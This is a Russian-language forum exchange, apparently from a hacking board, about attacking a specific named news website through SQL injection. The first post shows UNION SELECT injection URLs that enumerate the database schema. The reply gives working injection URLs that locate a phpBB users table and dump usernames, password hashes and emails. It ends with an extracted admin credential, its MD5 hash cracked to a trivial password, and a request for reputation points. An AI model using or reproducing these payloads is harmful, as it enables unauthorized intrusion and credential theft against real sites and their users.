Сайт вида: http://www.volga-astrakhan.ru/index.php3?act=paper&n=25125 Нашел уязвимость, подобрал число колонок. Версия 5.0.45-community, значит есть возможность узнать имена всех таблиц и колонок. Вообщем получился запрос такого вида: http://www.volga-astrakhan.ru/index.php3?act=paper&n=25125%20and%201=0%20union%20select%201,2,table_name,4,5%20from%20Information_schema.tables limit 0,1-- Вывелось название первой таблицы: CHARACTER_SETS Формируем следующий запрос: http://www.volga-astrakhan.ru/index.php3?act=paper&n=25125%20and%201=0%20union%20select%201,2,column_name,4,5%20from%20Information_schema.columns%20where%20table_name='CHARACTER_SETS' limit 0,1-- Вывелось название первой колонки в этой таблице: CHARACTER_SET_NAME Но когда я пишу и имя таблици и колонки, или даже просто таблици, ну например: http://www.volga-astrakhan.ru/index.php3?act=paper&n=25125%20and%201=0%20union%20select%201,2,CHARACTER_SET_NAME,4,5%20from%20CHARACTER_SET-- либо: http://www.volga-astrakhan.ru/index.php3?act=paper&n=25125%20and%201=0%20union%20select%201,2,3,4,5%20from%20CHARACTER_SET-- выводится пустая страница...
сначала находим нужную таблицу http://www.volga-astrakhan.ru/index.php3?act=paper&n=-25125+union+select+null,null,table_name,null,null+from+Information_schema.tables+limit+28,1-- потом определяемся в какой базе она находится /на сайте есть форум phpbb, а там есть таблица phpbb_users которая в 16 формате выгледит так 0x70687062625f7573657273/ http://www.volga-astrakhan.ru/index.php3?act=paper&n=-25125+union+select+null,null,table_schema,null,null+from+Information_schema.tables+where+table_name=0x70687062625f7573657273+limit+0,1-- потом получаем данные из этой таблицы http://www.volga-astrakhan.ru/index.php3?act=paper&n=-25125+union+select+null,null,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),null,null+from+test_bakulina.phpbb_users+limit+1,1-- получаем admin:e10adc3949ba59abbe56e057f20f883e:[email protected] расшифровываем хеш e10adc3949ba59abbe56e057f20f883e:123456 ставим мне +))))
